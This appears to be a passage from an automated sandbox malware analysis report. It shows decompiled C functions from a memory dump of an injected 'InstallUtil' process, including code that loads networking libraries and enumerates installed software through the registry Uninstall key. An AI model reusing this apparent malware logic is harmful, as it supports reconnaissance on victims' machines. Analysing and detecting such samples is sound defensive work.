                                                                      0x00000000
                                                                      0x0044b4aa
                                                                      0x0044b4a0
                                                                      0x0044b481
                                                                      0x0044b450
                                                                      0x0044b450
                                                                      0x0044b452
                                                                      0x00000000
                                                                      0x0044b454
                                                                      0x0044b454
                                                                      0x0044b459
                                                                      0x0044b45b
                                                                      0x0044b4c3
                                                                      0x0044b4c3
                                                                      0x0044b4c9
                                                                      0x0044b4cb
                                                                      0x0044b468
                                                                      0x0044b468
                                                                      0x0044b468
                                                                      0x0044b46b
                                                                      0x0044b46c
                                                                      0x0044b473
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044b45b
                                                                      0x0044b452
                                                                      0x0044b44e
                                                                      0x0044b440
                                                                      0x0044b410
                                                                      0x0044b3e9
                                                                      0x0044b3e9
                                                                      0x0044b3ee
                                                                      0x0044b3f4
                                                                      0x0044b476
                                                                      0x0044b47a
                                                                      0x0044b47a
                                                                      0x0044b38e
                                                                      0x0044b397
                                                                      0x0044b39f
                                                                      0x0044b3a3
                                                                      0x0044b3aa
                                                                      0x0044b3b0
                                                                      0x0044b3b2
                                                                      0x0044b3b4
                                                                      0x0044b3b9
                                                                      0x0044b3b9
                                                                      0x0044b3bc
                                                                      0x0044b3bc
                                                                      0x00000000
                                                                      0x0044b3b2
                                                                      0x0044b38c
                                                                      0x0044b379
                                                                      0x0044b351
                                                                      0x0044b2b2
                                                                      0x0044b20b
                                                                      0x0044b20b
                                                                      0x0044b20e
                                                                      0x0044b23f
                                                                      0x0044b23f
                                                                      0x0044b241
                                                                      0x0044b251
                                                                      0x0044b256
                                                                      0x0044b25b
                                                                      0x0044b261
                                                                      0x0044b264
                                                                      0x0044b266
                                                                      0x00000000
                                                                      0x0044b268
                                                                      0x0044b268
                                                                      0x0044b26e
                                                                      0x00000000
                                                                      0x0044b270
                                                                      0x0044b27a
                                                                      0x0044b27f
                                                                      0x0044b284
                                                                      0x0044b287
                                                                      0x0044b28d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044b28d
                                                                      0x0044b26e
                                                                      0x0044b243
                                                                      0x0044b243
                                                                      0x00000000
                                                                      0x0044b243
                                                                      0x0044b210
                                                                      0x0044b210
                                                                      0x0044b216
                                                                      0x00000000
                                                                      0x0044b218
                                                                      0x0044b218
                                                                      0x0044b21d
                                                                      0x0044b21f
                                                                      0x0044b28f
                                                                      0x0044b28f
                                                                      0x0044b295
                                                                      0x0044b295
                                                                      0x0044b297
                                                                      0x0044b22c
                                                                      0x0044b22c
                                                                      0x0044b22c
                                                                      0x0044b22f
                                                                      0x0044b230
                                                                      0x0044b237
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044b21f
                                                                      0x0044b216
                                                                      0x0044b20e
                                                                      0x0044b205
                                                                      0x0044b1d5
                                                                      0x0044b1ae
                                                                      0x0044b1ae
                                                                      0x0044b1b3
                                                                      0x0044b1b9
                                                                      0x0044b23a
                                                                      0x0044b23e
                                                                      0x0044b23e
                                                                      0x00000000

APIs
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID: _free$EnvironmentVariable$_wcschr
• String ID:
• API String ID: 3899193279-0
• Opcode ID: e91aa10088e317238f023b76b73dae80beacb6864b392510e86de2c286329403
• Instruction ID: 6ead060664317584d16e3b277bf431e6a5a664b5bbdb51fc59ac2edd09922d18
• Opcode Fuzzy Hash: e91aa10088e317238f023b76b73dae80beacb6864b392510e86de2c286329403
• Instruction Fuzzy Hash: 13D12471E003006BFB25AF769882A6EB7A4EF15724F0441AFE94597382EB7DDD0087D9
Uniqueness

Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0041235F() {
                                                                      				char _v264;
                                                                      				char _v532;
                                                                      				intOrPtr _v536;
                                                                      				CHAR* _v540;
                                                                      				intOrPtr _v544;
                                                                      				CHAR* _v548;
                                                                      				intOrPtr _v552;
                                                                      				_Unknown_base(*)()* _t42;
                                                                      				signed int _t52;
                                                                      				struct HINSTANCE__* _t54;
                                                                      				struct HINSTANCE__* _t57;
                                                                      				intOrPtr* _t63;
                                                                      				void* _t64;
                                                                      
                                                                      				 *_t63 = "getaddrinfo";
                                                                      				_v552 = E00411EE3;
                                                                      				_v548 = "getnameinfo";
                                                                      				_v544 = E00412189;
                                                                      				_v540 = "freeaddrinfo";
                                                                      				_v536 = E00411EA8;
                                                                      				if( *0x46fdc4 == 0) {
                                                                      					if(GetSystemDirectoryA( &_v264, 0x104) != 0) {
                                                                      						E0043DAD7( &_v532, 0x10c,  &_v264);
                                                                      						E0043DB31( &_v532, 0x10c, "\\ws2_32");
                                                                      						_t64 = _t63 + 0x18;
                                                                      						_t57 = LoadLibraryA( &_v532);
                                                                      						_t54 = 0;
                                                                      						if(_t57 == 0) {
                                                                      							L6:
                                                                      							E0043DAD7( &_v532, 0x10c,  &_v264);
                                                                      							E0043DB31( &_v532, 0x10c, "\\wship6");
                                                                      							_t64 = _t64 + 0x18;
                                                                      							_t57 = LoadLibraryA( &_v532);
                                                                      							if(_t57 != 0) {
                                                                      								if(GetProcAddress(_t57, "getaddrinfo") == 0) {
                                                                      									FreeLibrary(_t57);
                                                                      									_t57 = _t54;
                                                                      								}
                                                                      								if(_t57 != 0) {
                                                                      									goto L10;
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							if(GetProcAddress(_t57, "getaddrinfo") == 0) {
                                                                      								FreeLibrary(_t57);
                                                                      								_t57 = 0;
                                                                      							}
                                                                      							if(_t57 != 0) {
                                                                      								L10:
                                                                      								_t52 = _t54;
                                                                      								while(1) {
                                                                      									_t42 = GetProcAddress(_t57,  *(_t64 + 0x10 + _t52 * 8));
                                                                      									 *(_t64 + 0x14 + _t52 * 8) = _t42;
                                                                      									if(_t42 == 0) {
                                                                      										break;
                                                                      									}
                                                                      									_t52 = _t52 + 1;
                                                                      									if(_t52 < 3) {
                                                                      										continue;
                                                                      									} else {
                                                                      									}
                                                                      									L15:
                                                                      									if(_t57 != 0) {
                                                                      										do {
                                                                      											 *((intOrPtr*)(_t54 + 0x46c9ec)) =  *((intOrPtr*)(_t64 + _t54 + 0x14));
                                                                      											_t54 = _t54 + 8;
                                                                      										} while (_t54 < 0x18);
                                                                      									}
                                                                      									goto L17;
                                                                      								}
                                                                      								FreeLibrary(_t57);
                                                                      								_t57 = _t54;
                                                                      								goto L15;
                                                                      							} else {
                                                                      								goto L6;
                                                                      							}
                                                                      						}
                                                                      						L17:
                                                                      					}
                                                                      					 *0x46fdc4 = 1;
                                                                      				}
                                                                      				return  *0x46c9ec;
                                                                      			}


                                                                      APIs
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 004123AE
                                                                      • LoadLibraryA.KERNEL32(?), ref: 004123F0
                                                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00412410
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00412417
                                                                      • LoadLibraryA.KERNEL32(?), ref: 0041244F
                                                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00412461
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00412468
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00412477
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0041248E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                      • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                      • API String ID: 2490988753-744132762
                                                                      • Opcode ID: 91b5bfe2ac3bfb3195a583f8869c99ed9d5d707a353fcf8f79fad41f7cef83cd
                                                                      • Instruction ID: 6baed0d4847e4d040adf0db9f494970dc31872a82d40558cfe56e373b4b0cc2c
                                                                      • Opcode Fuzzy Hash: 91b5bfe2ac3bfb3195a583f8869c99ed9d5d707a353fcf8f79fad41f7cef83cd
                                                                      • Instruction Fuzzy Hash: D331F372806311ABC320EB50DC44ADFB6DCAF85758F01462BF985D3241E7BCD9948AAE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E00418BC0(void* __ebx, void* __ecx, void* __edx) {
                                                                      				char _v1028;
                                                                      				char _v1052;
                                                                      				void* _v1056;
                                                                      				char _v1076;
                                                                      				void* _v1080;
                                                                      				char _v1100;
                                                                      				void* _v1104;
                                                                      				char _v1124;
                                                                      				void* _v1128;
                                                                      				char _v1148;
                                                                      				void* _v1152;
                                                                      				char _v1172;
                                                                      				void* _v1176;
                                                                      				char _v1196;
                                                                      				void* _v1200;
                                                                      				char _v1220;
                                                                      				void* _v1224;
                                                                      				char _v1244;
                                                                      				void* _v1248;
                                                                      				char _v1268;
                                                                      				void* _v1272;
                                                                      				char _v1292;
                                                                      				void* _v1296;
                                                                      				char _v1316;
                                                                      				void* _v1320;
                                                                      				char _v1340;
                                                                      				char _v1364;
                                                                      				char _v1388;
                                                                      				char _v1412;
                                                                      				char _v1436;
                                                                      				char _v1460;
                                                                      				void* _v1464;
                                                                      				char _v1484;
                                                                      				int _v1488;
                                                                      				void* _v1492;
                                                                      				void* _v1496;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				long _t73;
                                                                      				long _t79;
                                                                      				int _t86;
                                                                      				void* _t188;
                                                                      				int _t207;
                                                                      				void* _t208;
                                                                      				void* _t210;
                                                                      				void** _t211;
                                                                      
                                                                      				_t188 = __edx;
                                                                      				_t130 = __ebx;
                                                                      				_t211 =  &_v1496;
                                                                      				_t208 = __ecx;
                                                                      				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v1492) == 0) {
                                                                      					_v1488 = 0x400;
                                                                      					_t207 = 0;
                                                                      					E00401F46(__ebx,  &_v1460);
                                                                      					_t73 = RegEnumKeyExA(_v1492, 0,  &_v1028,  &_v1488, 0, 0, 0, 0);
                                                                      					_t210 = RegCloseKey;
                                                                      					while(1) {
                                                                      						__eflags = _t73 - 0x103;
                                                                      						if(__eflags == 0) {
                                                                      							break;
                                                                      						}
                                                                      						__eflags = _t73;
                                                                      						if(_t73 != 0) {
                                                                      							L8:
                                                                      							_t207 = _t207 + 1;
                                                                      							__eflags = _t207;
                                                                      							_v1488 = 0x400;
                                                                      						} else {
                                                                      							_t79 = RegOpenKeyExA(_v1492,  &_v1028, 0, 0x20019,  &_v1496);
                                                                      							__eflags = _t79;
                                                                      							if(_t79 == 0) {
                                                                      								E00410BFA( &_v1484, _v1496, L"DisplayName");
                                                                      								 *_t211 = L"Publisher";
                                                                      								E00410BFA( &_v1340, _v1496);
                                                                      								 *_t211 = L"DisplayVersion";
                                                                      								E00410BFA( &_v1364, _v1496);
                                                                      								 *_t211 = L"InstallLocation";
                                                                      								E00410BFA( &_v1388, _v1496);
                                                                      								 *_t211 = L"InstallDate";
                                                                      								E00410BFA( &_v1412, _v1496);
                                                                      								 *_t211 = L"UninstallString";
                                                                      								E00410BFA( &_v1436, _v1496);
                                                                      								_t86 = E00409F76();
                                                                      								__eflags = _t86;
                                                                      								if(_t86 == 0) {
                                                                      									E0040321D(E00402FD4(_t130,  &_v1316, E00402FD4(_t130,  &_v1292, E004042DD(_t130,  &_v1268, E00402FD4(_t130,  &_v1244, E004042DD(_t130,  &_v1220, E00402FD4(_t130,  &_v1196, E004042DD(_t130,  &_v1172, E00402FD4(_t130,  &_v1148, E004042DD(_t130,  &_v1124, E00402FD4(_t130,  &_v1100, E004042DD(_t130,  &_v1076, E004078F9( &_v1052,  &_v1484, _t210, 0x467488), _t210, __eflags,  &_v1364), _t207, _t210, __eflags, 0x467488), _t210, __eflags,  &_v1412), _t207, _t210, __eflags, 0x467488), _t210, __eflags,  &_v1340), _t207, _t210, __eflags, 0x467488), _t210, __eflags,  &_v1388), _t207, _t210, __eflags, 0x467488), _t210, __eflags,  &_v1436), _t207, _t210, __eflags, 0x467488), _t207, _t210, __eflags, "\n"));
                                                                      									E00401EC9();
                                                                      									E00401EC9();
                                                                      									E00401EC9();
                                                                      									E00401EC9();
                                                                      									E00401EC9();
                                                                      									E00401EC9();
                                                                      									E00401EC9();
                                                                      									E00401EC9();
                                                                      									E00401EC9();
                                                                      									E00401EC9();
                                                                      									E00401EC9();
                                                                      									E00401EC9();
                                                                      								}
                                                                      								RegCloseKey(_v1496);
                                                                      								E00401EC9();
                                                                      								E00401EC9();
                                                                      								E00401EC9();
                                                                      								E00401EC9();
                                                                      								E00401EC9();
                                                                      								E00401EC9();
                                                                      								goto L8;
                                                                      							}
                                                                      						}
                                                                      						__eflags = 0;
                                                                      						_t73 = RegEnumKeyExA(_v1492, _t207,  &_v1028,  &_v1488, 0, 0, 0, 0);
                                                                      					}
                                                                      					RegCloseKey(_v1492);
                                                                      					E00403222(_t130, _t208, _t210, __eflags,  &_v1460);
                                                                      					E00401EC9();
                                                                      				} else {
                                                                      					E0040413E(__ebx, _t208, _t188, 0, 0x4610ec);
                                                                      				}
                                                                      				return _t208;
                                                                      			}


                                                                      APIs
                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 00418BE2
                                                                      • RegEnumKeyExA.ADVAPI32 ref: 00418C26
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00418EF0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseEnumOpen
                                                                      • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                      • API String ID: 1332880857-3714951968
                                                                      • Opcode ID: fc1eae32c231aabd5a7d80c0bfc11da0c77a2d32c50fee05a86febe305fe2445
                                                                      • Instruction ID: ac6cf546619efb93c63312ec69d48949324eae5a406f87cb75c52f424441e797
                                                                      • Opcode Fuzzy Hash: fc1eae32c231aabd5a7d80c0bfc11da0c77a2d32c50fee05a86febe305fe2445
                                                                      • Instruction Fuzzy Hash: 4F8132711183819BC324EB11DC51EEFB3E9AF94308F10492FF586921E2EF34A949CB5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 64%
                                                                      			E00419E78(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                      				struct tagPOINT _v12;
                                                                      				void* _t16;
                                                                      				struct HMENU__* _t17;
                                                                      				void* _t20;
                                                                      				void* _t24;
                                                                      
                                                                      				_t16 = _a8 - 1;
                                                                      				if(_t16 == 0) {
                                                                      					_t17 = CreatePopupMenu();
                                                                      					 *0x46deb0 = _t17;
                                                                      					AppendMenuA(_t17, 0, 0, "Close");
                                                                      					L15:
                                                                      					return 0;
                                                                      				}
                                                                      				_t20 = _t16 - 0x110;
                                                                      				if(_t20 == 0) {
                                                                      					if(_a12 != 0) {
                                                                      						goto L15;
                                                                      					}
                                                                      					Shell_NotifyIconA(2, 0x46deb8);
                                                                      					ExitProcess(0);
                                                                      				}
                                                                      				if(_t20 == 0x2f0) {
                                                                      					_t24 = _a16 - 0x201;
                                                                      					if(_t24 == 0) {
                                                                      						if(IsWindowVisible( *0x46deb4) == 0) {
                                                                      							ShowWindow( *0x46deb4, 9);
                                                                      							SetForegroundWindow( *0x46deb4);
                                                                      						} else {
                                                                      							ShowWindow( *0x46deb4, 0);
                                                                      						}
                                                                      						goto L15;
                                                                      					}
                                                                      					if(_t24 == 3) {
                                                                      						GetCursorPos( &_v12);
                                                                      						SetForegroundWindow(_a4);
                                                                      						TrackPopupMenu( *0x46deb0, 0, _v12, _v12.y, 0, _a4, 0);
                                                                      						goto L15;
                                                                      					}
                                                                      					_push(_a16);
                                                                      					_push(_a12);
                                                                      					_push(0x401);
                                                                      					L7:
                                                                      					return DefWindowProcA(_a4, ??, ??, ??);
                                                                      				}
                                                                      				_push(_a16);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				goto L7;
                                                                      			}

                                                                      APIs
                                                                      • DefWindowProcA.USER32(?,00000401,?,?), ref: 00419EC3
                                                                      • GetCursorPos.USER32(?), ref: 00419ED2
                                                                      • SetForegroundWindow.USER32(?), ref: 00419EDB
                                                                      • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00419EF5
                                                                      • Shell_NotifyIconA.SHELL32(00000002,0046DEB8), ref: 00419F46
                                                                      • ExitProcess.KERNEL32 ref: 00419F4E
                                                                      • CreatePopupMenu.USER32 ref: 00419F54
                                                                      • AppendMenuA.USER32 ref: 00419F69
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                      • String ID: Close
                                                                      • API String ID: 1657328048-3535843008
                                                                      • Opcode ID: 19b134224e6445c5e95f1e71c29887f026828f1ae5936c10d6d4738a5a3f977e
                                                                      • Instruction ID: d968d28f45dd76fa53ff807e51d9aa01234c839a4410edc7000f177ae0e62058
                                                                      • Opcode Fuzzy Hash: 19b134224e6445c5e95f1e71c29887f026828f1ae5936c10d6d4738a5a3f977e
                                                                      • Instruction Fuzzy Hash: 56211D31604204FFDB094FA4EE1DBAA3B75FB18306F000126F901981B1D7B6EDA1EB19
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E00441E16(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                                                                      				signed int _v8;
                                                                      				char _v21;
                                                                      				intOrPtr _v22;
                                                                      				struct _cpinfo _v28;
                                                                      				void* _v32;
                                                                      				void* _v36;
                                                                      				void* _v40;
                                                                      				intOrPtr* _v44;
                                                                      				signed int _v48;
                                                                      				void* _v52;
                                                                      				signed int* _v56;
                                                                      				intOrPtr _v60;
                                                                      				intOrPtr* _v64;
                                                                      				signed int* _v68;
                                                                      				void* _v72;
                                                                      				char _v76;
                                                                      				signed int _t101;
                                                                      				signed int _t123;
                                                                      				signed short _t126;
                                                                      				void* _t130;
                                                                      				void* _t134;
                                                                      				void* _t137;
                                                                      				void* _t138;
                                                                      				intOrPtr _t139;
                                                                      				void* _t141;
                                                                      				signed int _t142;
                                                                      				intOrPtr* _t143;
                                                                      				signed char _t160;
                                                                      				signed char _t165;
                                                                      				signed int _t166;
                                                                      				void* _t168;
                                                                      				signed int _t170;
                                                                      				void* _t179;
                                                                      				signed int* _t180;
                                                                      				signed int* _t181;
                                                                      				signed int _t182;
                                                                      				signed char* _t189;
                                                                      				signed char* _t190;
                                                                      				signed int _t192;
                                                                      				void* _t193;
                                                                      				intOrPtr _t197;
                                                                      				short* _t209;
                                                                      				intOrPtr* _t211;
                                                                      				intOrPtr* _t215;
                                                                      				signed int _t216;
                                                                      				signed int _t217;
                                                                      				void* _t218;
                                                                      				void* _t219;
                                                                      
                                                                      				_t101 =  *0x46c00c; // 0xe1ce05e9
                                                                      				_v8 = _t101 ^ _t217;
                                                                      				_t211 = _a4;
                                                                      				_t170 = 0;
                                                                      				_v64 = _t211;
                                                                      				_v32 = 0;
                                                                      				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
                                                                      				_v36 = 0;
                                                                      				_v40 = 0;
                                                                      				_v52 = 0;
                                                                      				_v76 = _t211;
                                                                      				_v72 = 0;
                                                                      				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
                                                                      					__eflags =  *(_t211 + 0x8c);
                                                                      					if( *(_t211 + 0x8c) != 0) {
                                                                      						asm("lock dec dword [eax]");
                                                                      					}
                                                                      					 *(_t211 + 0x8c) = _t170;
                                                                      					__eflags = 0;
                                                                      					 *(_t211 + 0x90) = _t170;
                                                                      					 *_t211 = 0x458870;
                                                                      					 *((intOrPtr*)(_t211 + 0x94)) = 0x458af0;
                                                                      					 *((intOrPtr*)(_t211 + 0x98)) = 0x458c70;
                                                                      					 *((intOrPtr*)(_t211 + 4)) = 1;
                                                                      					L41:
                                                                      					return E004318FB(_v8 ^ _t217);
                                                                      				}
                                                                      				_t106 = _t211 + 8;
                                                                      				_v44 = 0;
                                                                      				if( *(_t211 + 8) != 0) {
                                                                      					L3:
                                                                      					_v44 = E00441BB3(_t172, 1, 4);
                                                                      					E004427C2(_t170);
                                                                      					_v32 = E00441BB3(_t172, 0x180, 2);
                                                                      					E004427C2(_t170);
                                                                      					_v36 = E00441BB3(_t172, 0x180, 1);
                                                                      					E004427C2(_t170);
                                                                      					_v40 = E00441BB3(_t172, 0x180, 1);
                                                                      					E004427C2(_t170);
                                                                      					_t197 = E00441BB3(_t172, 0x101, 1);
                                                                      					_v52 = _t197;
                                                                      					E004427C2(_t170);
                                                                      					_t219 = _t218 + 0x3c;
                                                                      					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
                                                                      						L36:
                                                                      						E004427C2(_v44);
                                                                      						E004427C2(_v32);
                                                                      						E004427C2(_v36);
                                                                      						E004427C2(_v40);
                                                                      						_t170 = 1;
                                                                      						__eflags = 1;
                                                                      						goto L37;
                                                                      					} else {
                                                                      						_t123 = _t170;
                                                                      						do {
                                                                      							 *(_t123 + _t197) = _t123;
                                                                      							_t123 = _t123 + 1;
                                                                      						} while (_t123 < 0x100);
                                                                      						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
                                                                      							goto L36;
                                                                      						}
                                                                      						_t126 = _v28;
                                                                      						_t235 = _t126 - 5;
                                                                      						if(_t126 > 5) {
                                                                      							goto L36;
                                                                      						}
                                                                      						_t28 = _t197 + 1; // 0x1
                                                                      						_v48 = _t126 & 0x0000ffff;
                                                                      						_t192 = 0xff;
                                                                      						_t130 = E00445CF2(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
                                                                      						_t219 = _t219 + 0x24;
                                                                      						_t236 = _t130;
                                                                      						if(_t130 == 0) {
                                                                      							goto L36;
                                                                      						}
                                                                      						_t34 = _t197 + 1; // 0x1
                                                                      						_t134 = E00445CF2(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
                                                                      						_t219 = _t219 + 0x24;
                                                                      						if(_t134 == 0) {
                                                                      							goto L36;
                                                                      						}
                                                                      						if(_v48 <= 1 || _v22 == _t170) {
                                                                      							L22:
                                                                      							_v60 = _v32 + 0x100;
                                                                      							_t137 = E0044CE9D(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
                                                                      							_t219 = _t219 + 0x1c;
                                                                      							if(_t137 == 0) {
                                                                      								goto L36;
                                                                      							}
                                                                      							_t193 = _v32;
                                                                      							_t138 = _t193 + 0xfe;
                                                                      							 *_t138 = 0;
                                                                      							_t179 = _v36;
                                                                      							_v32 = _t138;
                                                                      							_t139 = _v40;
                                                                      							 *(_t179 + 0x7f) = _t170;
                                                                      							_t180 = _t179 - 0xffffff80;
                                                                      							 *(_t139 + 0x7f) = _t170;
                                                                      							_v68 = _t180;
                                                                      							 *_t180 = _t170;
                                                                      							_t181 = _t139 + 0x80;
                                                                      							_v56 = _t181;
                                                                      							 *_t181 = _t170;
                                                                      							if(_v48 <= 1 || _v22 == _t170) {
                                                                      								L32:
                                                                      								_t182 = 0x3f;
                                                                      								memcpy(_t193, _t193 + 0x200, _t182 << 2);
                                                                      								_push(0x1f);
                                                                      								asm("movsw");
                                                                      								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
                                                                      								_push(0x1f);
                                                                      								asm("movsw");
                                                                      								asm("movsb");
                                                                      								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
                                                                      								asm("movsw");
                                                                      								asm("movsb");
                                                                      								_t215 = _v64;
                                                                      								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
                                                                      									asm("lock xadd [ecx], eax");
                                                                      									if((_t142 | 0xffffffff) == 0) {
                                                                      										E004427C2( *(_t215 + 0x90) - 0xfe);
                                                                      										E004427C2( *(_t215 + 0x94) - 0x80);
                                                                      										E004427C2( *(_t215 + 0x98) - 0x80);
                                                                      										E004427C2( *((intOrPtr*)(_t215 + 0x8c)));
                                                                      									}
                                                                      								}
                                                                      								_t143 = _v44;
                                                                      								 *_t143 = 1;
                                                                      								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
                                                                      								 *_t215 = _v60;
                                                                      								 *(_t215 + 0x90) = _v32;
                                                                      								 *(_t215 + 0x94) = _v68;
                                                                      								 *(_t215 + 0x98) = _v56;
                                                                      								 *(_t215 + 4) = _v48;
                                                                      								L37:
                                                                      								E004427C2(_v52);
                                                                      								goto L41;
                                                                      							} else {
                                                                      								_t189 =  &_v21;
                                                                      								while(1) {
                                                                      									_t160 =  *_t189;
                                                                      									if(_t160 == 0) {
                                                                      										break;
                                                                      									}
                                                                      									_t216 =  *(_t189 - 1) & 0x000000ff;
                                                                      									if(_t216 > (_t160 & 0x000000ff)) {
                                                                      										L30:
                                                                      										_t189 =  &(_t189[2]);
                                                                      										if( *(_t189 - 1) != _t170) {
                                                                      											continue;
                                                                      										}
                                                                      										break;
                                                                      									}
                                                                      									_t209 = _t193 + 0x100 + _t216 * 2;
                                                                      									do {
                                                                      										_t216 = _t216 + 1;
                                                                      										 *_t209 = 0x8000;
                                                                      										_t209 = _t209 + 2;
                                                                      									} while (_t216 <= ( *_t189 & 0x000000ff));
                                                                      									goto L30;
                                                                      								}
                                                                      								goto L32;
                                                                      							}
                                                                      						} else {
                                                                      							_t190 =  &_v21;
                                                                      							while(1) {
                                                                      								_t165 =  *_t190;
                                                                      								if(_t165 == 0) {
                                                                      									goto L22;
                                                                      								}
                                                                      								_t192 =  *(_t190 - 1) & 0x000000ff;
                                                                      								_t166 = _t165 & 0x000000ff;
                                                                      								while(_t192 <= _t166) {
                                                                      									 *((char*)(_t192 + _t197)) = 0x20;
                                                                      									_t192 = _t192 + 1;
                                                                      									__eflags = _t192;
                                                                      									_t166 =  *_t190 & 0x000000ff;
                                                                      								}
                                                                      								_t190 =  &(_t190[2]);
                                                                      								_t242 =  *(_t190 - 1) - _t170;
                                                                      								if( *(_t190 - 1) != _t170) {
                                                                      									continue;
                                                                      								}
                                                                      								goto L22;
                                                                      							}
                                                                      							goto L22;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_t168 = E0044EBE5(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
                                                                      				_t219 = _t218 + 0x14;
                                                                      				if(_t168 != 0) {
                                                                      					goto L36;
                                                                      				}
                                                                      				goto L3;
                                                                      			}

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$Info
                                                                      • String ID:
                                                                      • API String ID: 2509303402-0
                                                                      • Opcode ID: a1cad53ea91165d0db56accbaabdea4ba71c576b8a85ea07d6ee0cbfa5762954
                                                                      • Instruction ID: b31c419f4cfa1cef3f21f0d24aa3bcbc0ab6427042d84dd07d5ee1350d7856e5
                                                                      • Opcode Fuzzy Hash: a1cad53ea91165d0db56accbaabdea4ba71c576b8a85ea07d6ee0cbfa5762954
                                                                      • Instruction Fuzzy Hash: FBB1BE719002059FEB10DFBAC981BAEBBF4FF08304F54406EF995A7252DBB99841CB64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0044D037(intOrPtr _a4) {
                                                                      				intOrPtr _v8;
                                                                      				intOrPtr _t25;
                                                                      				intOrPtr* _t26;
                                                                      				intOrPtr _t28;
                                                                      				intOrPtr* _t29;
                                                                      				intOrPtr* _t31;
                                                                      				intOrPtr* _t45;
                                                                      				intOrPtr* _t46;
                                                                      				intOrPtr* _t47;
                                                                      				intOrPtr* _t55;
                                                                      				intOrPtr* _t70;
                                                                      				intOrPtr _t74;
                                                                      
                                                                      				_t74 = _a4;
                                                                      				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                                      				if(_t25 != 0 && _t25 != 0x46c178) {
                                                                      					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
